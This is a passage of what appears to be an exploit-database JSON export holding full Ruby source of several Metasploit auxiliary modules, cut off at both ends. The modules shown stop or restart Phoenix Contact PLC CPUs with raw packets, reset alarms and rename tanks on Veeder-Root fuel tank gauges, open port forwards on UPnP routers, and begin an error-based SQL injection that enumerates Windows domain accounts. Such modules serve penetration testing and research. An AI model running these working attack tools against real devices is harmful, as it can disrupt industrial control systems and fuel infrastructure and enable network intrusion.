Deneut <tijl.deneut[at]howest.be>',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ],\n [ 'CVE', '2014-9195']\n ],\n 'DisclosureDate' => 'May 20 2015'))\n register_options(\n [\n OptEnum.new('ACTION', [true, 'PLC CPU action, REV means reverse current CPU state', 'NOOP',\n [\n 'STOP',\n 'START',\n 'REV',\n 'NOOP'\n ]]),\n OptPort.new('RINFOPORT', [true, 'Set info port', 1962 ]),\n OptPort.new('RPORT', [false, 'Set action port, will try autodetect when not set' ])\n ], self.class\n )\n end\n\n # Here comes the code, hang on to your pants\n def bin_to_hex(s)\n s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def hex_to_bin(s)\n s.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def send_recv_once(data)\n buf = ''\n begin\n sock.put(data)\n buf = sock.get_once || ''\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\n end\n\n bin_to_hex(buf)\n end\n\n def get_info(rhost, rport)\n connect(true, 'RHOST' => rhost, 'RPORT' => rport)\n data = send_recv_once(\"\\x01\\x01\\x00\\x1a\\x00^\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x0cIBETH01N0_M\\x00\")\n if data.nil? || data.length < 36\n print_error(\"Could not obtain information on this device\")\n disconnect\n return \"UNKNOWN\"\n end\n code = data[34..35]\n send_recv_once(\"\\x01\\x05\\x00\\x16\\x00\\x5f\\x00\\x00\\x08\\xef\\x00\" + hex_to_bin(code) + \"\\x00\\x00\\x00\\x22\\x00\\x04\\x02\\x95\\x00\\x00\")\n data = send_recv_once(\"\\x01\\x06\\x00\\x0e\\x00\\x61\\x00\\x00\\x88\\x11\\x00\" + hex_to_bin(code) + \"\\x04\\x00\")\n disconnect\n if data.nil? || data.length < 200\n print_error(\"Could not obtain information on this device\")\n return \"UNKNOWN\"\n end\n plctype = hex_to_bin(data[60..99])\n print_status(\"PLC Type = \" + plctype)\n print_status(\"Firmware = \" + hex_to_bin(data[132..139]))\n print_status(\"Build = \" + hex_to_bin(data[158..174]) + \" \" + hex_to_bin(data[182..199]))\n print_status('------------------------------------')\n plctype\n end\n\n def init_phase1\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00/\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xffAde.Remoting.Services.IProConOSControlService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00.\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IProConOSControlService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDataAccessService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDeviceInfoService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDeviceInfoService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00%\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd9\\xffAde.Remoting.Services.IForceService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00$\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IForceService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xce\\xffAde.Remoting.Services.ISimpleFileAccessService3\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.ISimpleFileAccessService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDeviceInfoService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDeviceInfoService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDataAccessService3\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDataAccessService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd4\\xffAde.Remoting.Services.IDataAccessService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00)\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd5\\xffAde.Remoting.Services.IBreakpointService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd6\\xffAde.Remoting.Services.ICallstackService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00%\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IDebugService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00/\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xffAde.Remoting.Services.IProConOSControlService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x00.\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.IProConOSControlService\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xce\\xffAde.Remoting.Services.ISimpleFileAccessService3\\x00\")\n send_recv_once(\"\\x01\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ade.Remoting.Services.ISimpleFileAccessService2\\x00\")\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x0e\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\\x12@\\x13@\\x13\\x00\\x11@\\x12\\x00\")\n end\n\n def init_phase2\n send_recv_once(\"\\xcc\\x01\\x00\\r\\xc0\\x01\\x00\\x00\\xd5\\x17\")\n send_recv_once(\"\\xcc\\x01\\x00\\x0b@\\x02\\x00\\x00G\\xee\")\n send_recv_once(\"\\xcc\\x01\\x00[@\\x03\\x1c\\x00\\x01\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\x9a\")\n send_recv_once(\"\\xcc\\x01\\x00[@\\x04\\x1c\\x00\\x01\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xeaC\")\n send_recv_once(\"\\xcc\\x01\\x00\\x06@\\x05\\x00\\x006\\x1e\")\n send_recv_once(\"\\xcc\\x01\\x00\\x07@\\x06\\x10\\x00&u\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x82\")\n end\n\n def get_state1(data)\n if data[48..49] == '03'\n state = 'RUN'\n elsif data[48..49] == '07'\n state = 'STOP'\n elsif data[49..49] == '00'\n state = 'ON'\n else\n print_error('CPU State not detected, full result is ' + data)\n return\n end\n state\n end\n\n def get_state2(data)\n if data[16..17] == '04'\n state = 'STOP'\n elsif data[16..17] == '02'\n state = 'RUN'\n else\n print_error('CPU State not detected, full result is ' + data)\n return\n end\n state\n end\n\n def get_cpu(rhost, rport, devicetype)\n connect(true, 'RHOST' => rhost, 'RPORT' => rport)\n state = 'unknown'\n if devicetype == '15x'\n init_phase1\n ## KeepAlive packet\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x1c\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x07\\x00\\x05\\x00\\x06\\x00\\x08\\x00\\x10\\x00\\x02\\x00\\x11\\x00\\x0e\\x00\\x0f\\x00\\r\\x00\\x16@\\x16\\x00\")\n ## Query packet\n data = send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x08\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x40\\x0b\\x40\")\n state = get_state1(data)\n elsif devicetype == '39x'\n init_phase2\n data = send_recv_once(\"\\xcc\\x01\\x00\\x0f@\\x07\\x00\\x00\\xea\\xfa\")\n state = get_state2(data)\n end\n disconnect\n print_status('CPU Mode = ' + state)\n state\n end\n\n def set_cpu(rhost, rport, action, state, devicetype)\n connect(true, 'RHOST' => rhost, 'RPORT' => rport)\n if devicetype == '15x'\n init_phase1 ## Several packets (21)\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x1c\\x00\\x03\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x07\\x00\\x05\\x00\\x06\\x00\\x08\\x00\\x10\\x00\\x02\\x00\\x11\\x00\\x0e\\x00\\x0f\\x00\\r\\x00\\x16@\\x16\\x00\")\n if action == 'START' || (action == 'REV' && state == 'STOP')\n print_status('--> Sending COLD start now')\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x01\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x01\\x00\")\n else\n print_status('--> Sending STOP now')\n send_recv_once(\"\\x01\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x07\\x00\\x00\\x00\\x00\\x00\")\n end\n elsif devicetype == '39x'\n init_phase2 ## Several packets (6)\n if action == 'START' || (action == 'REV' && state == 'STOP')\n print_status('--> Sending COLD start now')\n send_recv_once(\"\\xcc\\x01\\x00\\x04\\x40\\x0e\\x00\\x00\\x18\\x21\")\n else\n print_status('--> Sending STOP now')\n send_recv_once(\"\\xcc\\x01\\x00\\x01\\x40\\x0e\\x00\\x00\\x4c\\x07\")\n end\n else\n print_error('Unknown device type')\n return\n end\n sleep(1) ## It takes a second for a PLC to start\n get_cpu(rhost, rport, devicetype)\n disconnect\n end\n\n def run\n rhost = datastore['RHOST']\n action = datastore['ACTION']\n ractionport = datastore['RPORT']\n\n device = get_info(rhost, datastore['RINFOPORT'])\n\n if device.start_with?('ILC 15', 'ILC 17')\n devicetype = '15x'\n print_status('--> Detected 15x/17x series, getting current CPU state:')\n ractionport.nil? ? (rport = 41100) : (rport = ractionport)\n elsif device.start_with?('ILC 39')\n devicetype = '39x'\n print_status('--> Detected 39x series, getting current CPU state:')\n ractionport.nil? ? (rport = 20547) : (rport = ractionport)\n else\n print_error('Only ILC and (some) RFC devices are supported.')\n return\n end\n\n state = get_cpu(rhost, rport, devicetype)\n print_status('------------------------------------')\n\n if action == \"NOOP\"\n print_status(\"--> No action specified (#{action}), stopping here\")\n return\n end\n\n set_cpu(rhost, rport, action, state, devicetype)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/phoenix_command.rb"}, {"lastseen": "2019-11-22T17:14:59", "bulletinFamily": "exploit", "description": "This module acts as a simplistic administrative client for interfacing with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking the TLS-250 and TLS-350 protocols. This has been tested against GasPot and Conpot, both honeypots meant to simulate ATGs; it has not been tested against anything else, so use at your own risk.\n", "modified": "2017-07-24T13:26:21", "published": "2015-11-17T18:59:37", "id": "MSF:AUXILIARY/ADMIN/ATG/ATG_CLIENT", "href": "", "type": "metasploit", "title": "Veeder-Root Automatic Tank Gauge (ATG) Administrative Client", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Veeder-Root Automatic Tank Gauge (ATG) Administrative Client',\n 'Description' => %q{\n This module acts as a simplistic administrative client for interfacing\n with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n the TLS-250 and TLS-350 protocols. This has been tested against\n GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n been tested against anything else, so use at your own risk.\n },\n 'Author' =>\n [\n 'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges'],\n ['URL', 'http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment'],\n ['URL', 'https://github.com/sjhilt/GasPot'],\n ['URL', 'https://github.com/mushorg/conpot'],\n ['URL', 'http://www.veeder.com/us/automatic-tank-gauge-atg-consoles'],\n ['URL', 'http://www.chipkin.com/files/liz/576013-635.pdf'],\n ['URL', 'http://www.veeder.com/gold/download.cfm?doc_id=6227']\n ],\n 'DefaultAction' => 'INVENTORY',\n 'Actions' =>\n [\n [ 'ALARM',\n {\n 'Description' => 'I30200 Sensor alarm history (untested)',\n 'TLS-350_CMD' => \"\\x01I30200\"\n }\n ],\n [ 'ALARM_RESET',\n {\n 'Description' => 'IS00300 Remote alarm reset (untested)',\n 'TLS-350_CMD' => \"\\x01IS00300\"\n }\n ],\n [ 'DELIVERY',\n {\n 'Description' => 'I20200 Delivery report',\n 'TLS-350_CMD' => \"\\x01I20200\"\n }\n ],\n [ 'INVENTORY',\n {\n 'Description' => '200/I20100 In-tank inventory report',\n 'TLS-250_CMD' => \"\\x01200\",\n 'TLS-350_CMD' => \"\\x01I20100\"\n }\n ],\n [ 'LEAK',\n {\n 'Description' => 'I20300 Leak report',\n 'TLS-350_CMD' => \"\\x01I20300\"\n }\n ],\n [ 'RELAY',\n {\n 'Description' => 'I40600 Relay status (untested)',\n 'TLS-350_CMD' => \"\\x01I40600\"\n }\n ],\n [ 'RESET',\n {\n 'Description' => 'IS00100 Reset (untested)',\n 'TLS-350_CMD' => \"\\x01IS00100\"\n }\n ],\n [ 'CLEAR_RESET',\n {\n 'Description' => 'IS00200 Clear Reset Flag (untested)',\n 'TLS-350_CMD' => \"\\x01IS00200\"\n }\n ],\n [ 'SENSOR',\n {\n 'Description' => 'I30100 Sensor status (untested)',\n 'TLS-350_CMD' => \"\\x01I30100\"\n }\n ],\n [ 'SENSOR_DIAG',\n {\n 'Description' => 'IB0100 Sensor diagnostics (untested)',\n 'TLS-350_CMD' => \"\\x01IB0100\"\n }\n ],\n [ 'SHIFT',\n {\n 'Description' => 'I20400 Shift report',\n 'TLS-350_CMD' => \"\\x01I20400\"\n }\n ],\n [ 'SET_TANK_NAME',\n {\n 'Description' => 'S602 set tank name (use TANK_NUMBER and TANK_NAME options)',\n 'TLS-350_CMD' => \"\\x01S602\"\n }\n ],\n # [ 'SET_TIME',\n # {\n # 'Description' => 'S50100 Set time of day (use TIME option) (untested)',\n # 'TLS-350_CMD' => \"\\x01S50100\"\n # }\n # ],\n [ 'STATUS',\n {\n 'Description' => 'I20500 In-tank status report',\n 'TLS-350_CMD' => \"\\x01I20500\"\n }\n ],\n [ 'SYSTEM_STATUS',\n {\n 'Description' => 'I10100 System status report (untested)',\n 'TLS-350_CMD' => \"\\x01I10100\"\n }\n ],\n [ 'TANK_ALARM',\n {\n 'Description' => 'I20600 Tank alarm history (untested)',\n 'TLS-350_CMD' => \"\\x01I20600\"\n }\n ],\n [ 'TANK_DIAG',\n {\n 'Description' => 'IA0100 Tank diagnostics (untested)',\n 'TLS-350_CMD' => \"\\x01IA0100\"\n }\n ],\n [ 'VERSION',\n {\n 'Description' => 'Version information',\n 'TLS-250_CMD' => \"\\x01980\",\n 'TLS-350_CMD' => \"\\x01I90200\"\n }\n ]\n ]\n )\n\n register_options(\n [\n Opt::RPORT(10001),\n OptInt.new('TANK_NUMBER', [false, 'The tank number to operate on (use with SET_TANK_NAME, 0 to change all)', 1]),\n OptString.new('TANK_NAME', [false, 'The tank name to set (use with SET_TANK_NAME, defaults to random)'])\n ]\n )\n deregister_options('SSL', 'SSLCipher', 'SSLVerifyMode', 'SSLVersion')\n\n register_advanced_options(\n [\n OptEnum.new('PROTOCOL', [true, 'The Veeder-Root TLS protocol to speak', 'TLS-350', %w(TLS-350 TLS-250)]),\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for responses to our probes', 5])\n ]\n )\n end\n\n def setup\n # ensure that the specified command is implemented for the desired version of the TLS protocol\n unless action.opts.keys.include?(protocol_opt_name)\n fail_with(Failure::BadConfig, \"#{action.name} not defined for #{protocol}\")\n end\n\n # ensure that the tank number is set for the commands that need it\n if action.name == 'SET_TANK_NAME' && (tank_number < 0 || tank_number > 99)\n fail_with(Failure::BadConfig, \"TANK_NUMBER #{tank_number} is invalid\")\n end\n\n unless timeout > 0\n fail_with(Failure::BadConfig, \"Invalid timeout #{timeout} -- must be > 0\")\n end\n end\n\n def get_response(request)\n sock.put(request)\n response = sock.get_once(-1, timeout)\n response.strip!\n response += \" (command not understood)\" if response == \"9999FF1B\"\n response\n end\n\n def protocol\n datastore['PROTOCOL']\n end\n\n def protocol_opt_name\n protocol + '_CMD'\n end\n\n def tank_name\n @tank_name ||= (datastore['TANK_NAME'] ? datastore['TANK_NAME'] : Rex::Text.rand_text_alpha(16))\n end\n\n def tank_number\n datastore['TANK_NUMBER']\n end\n\n def time\n if datastore['TIME']\n Time.parse(datastore['TIME']).to_i\n else\n Time.now.to_i\n end\n end\n\n def timeout\n datastore['TIMEOUT']\n end\n\n def run_host(_host)\n begin\n connect\n case action.name\n when 'SET_TANK_NAME'\n # send the set tank name command to change the tank name(s)\n if tank_number == 0\n vprint_status(\"Setting all tank names to #{tank_name}\")\n else\n vprint_status(\"Setting tank ##{tank_number}'s name to #{tank_name}\")\n end\n request = \"#{action.opts[protocol_opt_name]}#{format('%02d', tank_number)}#{tank_name}\\n\"\n sock.put(request)\n # reconnect\n disconnect\n connect\n # send an inventory probe to show that it succeeded\n inventory_probe = \"#{actions.find { |a| a.name == 'INVENTORY' }.opts[protocol_opt_name]}\\n\"\n inventory_response = get_response(inventory_probe)\n message = \"#{protocol} #{action.opts['Description']}:\\n#{inventory_response}\"\n if inventory_response.include?(tank_name)\n print_good message\n else\n print_warning message\n end\n else\n response = get_response(\"#{action.opts[protocol_opt_name]}\\n\")\n print_good(\"#{protocol} #{action.opts['Description']}:\")\n print_line(response)\n end\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/atg/atg_client.rb"}, {"lastseen": "2019-12-04T18:14:04", "bulletinFamily": "exploit", "description": "Manage port mappings on UPnP IGD-capable device using the AddPortMapping and DeletePortMapping SOAP requests\n", "modified": "2017-07-24T13:26:21", "published": "2015-08-31T17:22:36", "id": "MSF:AUXILIARY/ADMIN/UPNP/SOAP_PORTMAPPING", "href": "", "type": "metasploit", "title": "UPnP IGD SOAP Port Mapping Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize\n super(\n 'Name' => 'UPnP IGD SOAP Port Mapping Utility',\n 'Description' => %q{\n Manage port mappings on UPnP IGD-capable device using the AddPortMapping and\n DeletePortMapping SOAP requests\n },\n 'Author' =>\n [\n 'St0rn <fabien[at]anbu-pentest.com>', # initial module\n 'Jon Hart <jon_hart[at]rapid7.com>' # module cleanup and refactoring\n ],\n 'License' => MSF_LICENSE,\n 'References' => [['URL', 'http://www.upnp-hacks.org/igd.html']],\n 'DefaultAction' => 'ADD',\n 'Actions' =>\n [\n [ 'ADD',\n {\n 'Description' => 'Use the AddPortMapping SOAP command to open and forward a port',\n 'SOAP_ACTION' => 'AddPortMapping'\n }\n ],\n [ 'DELETE',\n {\n 'Description' => 'Use the DeletePortMapping SOAP command to remove a port forwarding',\n 'SOAP_ACTION' => 'DeletePortMapping'\n }\n ]\n ],\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'UPnP control URL', '/' ]),\n OptAddress.new('INTERNAL_CLIENT', [false, 'Internal client hostname/IP']),\n OptAddress.new('EXTERNAL_CLIENT', [false, 'External client hostname/IP']),\n OptEnum.new('PROTOCOL', [true, 'Transport level protocol to map', 'TCP', %w(TCP UDP)]),\n OptInt.new('INTERNAL_PORT', [false, 'Internal port']),\n OptInt.new('EXTERNAL_PORT', [true, 'External port']),\n OptInt.new('LEASE_DURATION', [false, 'Lease time for mapping, in seconds', 3600])\n ],\n self.class\n )\n end\n\n def internal_port\n @internal_port ||= datastore['INTERNAL_PORT']\n end\n\n def internal_client\n @internal_client ||= datastore['INTERNAL_CLIENT']\n end\n\n def external_port\n @external_port ||= datastore['EXTERNAL_PORT']\n end\n\n def external_client\n @external_client ||= datastore['EXTERNAL_CLIENT']\n end\n\n def lease_duration\n @lease_duration ||= datastore['LEASE_DURATION']\n end\n\n def protocol\n @protocol ||= datastore['PROTOCOL']\n end\n\n def soap_action\n @soap_action ||= action.opts['SOAP_ACTION']\n end\n\n def build_soap\n builder = ::Nokogiri::XML::Builder.new do |xml|\n xml['SOAP-ENV'].Envelope('xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope', 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/') do\n xml['SOAP-ENV'].Body do\n xml['m'].send(soap_action, 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1') do\n case action.name\n when 'ADD'\n xml.NewPortMappingDescription(Rex::Text.rand_text_alpha(8)) { xml.parent.namespace = nil }\n xml.NewLeaseDuration(lease_duration) { xml.parent.namespace = nil }\n xml.NewInternalClient(internal_client) { xml.parent.namespace = nil }\n xml.NewEnabled(1) { xml.parent.namespace = nil }\n xml.NewExternalPort(external_port) { xml.parent.namespace = nil }\n xml.NewRemoteHost(external_client) { xml.parent.namespace = nil }\n xml.NewProtocol(protocol) { xml.parent.namespace = nil }\n xml.NewInternalPort(internal_port) { xml.parent.namespace = nil }\n when 'DELETE'\n xml.NewExternalPort(external_port) { xml.parent.namespace = nil }\n xml.NewRemoteHost(external_client) { xml.parent.namespace = nil }\n xml.NewProtocol(protocol) { xml.parent.namespace = nil }\n end\n end\n end\n end\n end\n builder.to_xml\n end\n\n def run\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'POST',\n 'content-type' => 'text/xml;charset=\"utf-8\"',\n 'data' => build_soap,\n 'headers' => {\n 'SoapAction' => \"urn:schemas-upnp-org:service:WANIPConnection:1##{soap_action}\"\n }\n )\n\n external_map = \"#{external_client ? external_client : 'any'}:#{external_port}/#{protocol}\"\n internal_map = \"#{internal_client ? internal_client : 'any'}:#{internal_port}/#{protocol}\"\n map = \"#{external_map} -> #{internal_map}\"\n\n if res\n if res.code == 200\n print_good(\"#{peer} #{map} #{action.name} succeeded\")\n else\n print_error(\"#{peer} #{map} #{action.name} failed with response code #{res.code}\")\n vprint_status(\"#{res.body}\")\n end\n else\n print_error(\"#{peer} no response for #{map} #{action.name}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/upnp/soap_portmapping.rb"}, {"lastseen": "2019-11-27T19:22:14", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for the Amazon Fire TV's YouTube app. Tested on the Amazon Fire TV Stick.\n", "modified": "2017-07-24T13:26:21", "published": "2015-02-17T11:44:04", "id": "MSF:AUXILIARY/ADMIN/FIRETV/FIRETV_YOUTUBE", "href": "", "type": "metasploit", "title": "Amazon Fire TV YouTube Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Amazon Fire TV YouTube Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.\n },\n 'Author' => ['wvu'],\n 'References' => [\n ['URL', 'http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1'],\n ['URL', 'http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Play', 'Description' => 'Play video'],\n ['Stop', 'Description' => 'Stop video']\n ],\n 'DefaultAction' => 'Play'\n ))\n\n register_options([\n Opt::RPORT(8008),\n OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])\n ])\n end\n\n def run\n case action.name\n when 'Play'\n stop\n sleep(1)\n res = play\n when 'Stop'\n res = stop\n end\n\n return unless res\n\n case res.code\n when 201\n print_good(\"Playing https://www.youtube.com/watch?v=#{datastore['VID']}\")\n when 200\n print_status('Stopping video')\n when 404\n print_error(\"Couldn't #{action.name.downcase} video\")\n end\n end\n\n def play\n begin\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/apps/YouTube',\n 'ctype' => 'text/plain',\n 'vars_post' => {\n 'v' => datastore['VID']\n }\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\n\n def stop\n begin\n send_request_raw(\n 'method' => 'DELETE',\n 'uri' => '/apps/YouTube/run'\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/firetv/firetv_youtube.rb"}, {"lastseen": "2019-10-01T16:08:47", "bulletinFamily": "exploit", "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server using the SUSER_SNAME function via Error Based SQL injection. This is similar to the smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC role (everyone). Information that can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated accounts can then be used in online dictionary attacks. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-25T15:57:20", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ENUM_DOMAIN_ACCOUNTS_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/mssql_commands'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::MSSQL_SQLI\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration',\n 'Description' => %q{\n This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n },\n 'Author' =>\n [\n 'nullbind <scott.sutherland[at]netspi.com>',\n 'antti <antti.rantasaari[at]netspi.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' => [[ 'URL','http://msdn.microsoft.com/en-us/library/ms174427.aspx']]\n ))\n\n register_options(\n [\n OptInt.new('START_RID', [true, 'RID to start fuzzing at.', 500]),\n OptInt.new('END_RID', [true, 'RID to stop fuzzing at.', 3000])\n ])\n end\n\n def run\n print_status(\"Grabbing the SQL Server name and domain...\")\n db_server_name = get_server_name\n if db_server_name.nil?\n print_error(\"Unable to grab the server name\")\n return\n else\n print_good(\"Server name: #{db_server_name}\")\n end\n\n db_domain_name = get_domain_name\n if db_domain_name.nil?\n print_error(\"Unable to grab domain name\")\n return\n end\n\n # Check if server is on a domain\n if db_server_name == db_domain_name\n print_error(\"The SQL Server does not appear to be part of a Windows domain\")\n return\n else\n print_good(\"Domain name: #{db_domain_name}\")\n end\n\n print_status(\"Grabbing the SID for the domain...\")\n windows_domain_sid = get_windows_domain_sid(db_domain_name)\n if windows_domain_sid.nil?\n print_error(\"Could not recover the SQL Server's domain sid.\")\n return\n else\n print_good(\"Domain sid: 